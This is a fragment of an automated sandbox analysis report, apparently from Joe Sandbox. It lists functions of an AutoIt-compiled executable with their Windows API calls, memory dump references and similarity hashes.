                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                        • String ID: Shell_TrayWnd
                                                                                                        • API String ID: 529655941-2988720461
                                                                                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                        Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message_doexit
                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D